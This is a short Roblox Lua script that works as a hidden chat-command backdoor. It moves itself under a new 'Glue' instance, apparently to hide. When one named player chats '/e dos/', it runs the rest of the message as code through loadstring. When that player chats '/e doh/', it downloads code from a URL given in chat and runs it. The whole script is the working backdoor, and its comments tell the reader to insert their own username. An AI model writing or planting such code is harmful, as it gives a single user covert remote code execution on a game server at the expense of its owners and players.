--[[ In this script, edit only things that are told to edit in the green comments. --]] EnabledUser = "TheProNoob2004" -- Put your name in the quotes, without deleting them. local Commands = {} local Logs = {} script.Parent = Instance.new('Glue') table.insert(Commands, "/e dos/") table.insert(Commands, "/e doh/") function C(M) if string.sub(M, 1, 7) == "/e dos/" then loadstring(string.sub(M, 8))() table.insert(Logs, M) end if string.sub(M, 1, 7) == "/e doh/" then loadstring(game:GetService('HttpService'):GetAsync(string.sub(M, 8), true))() table.insert(Logs, M) end end game.Players[EnabledUser].Chatted:connect(C)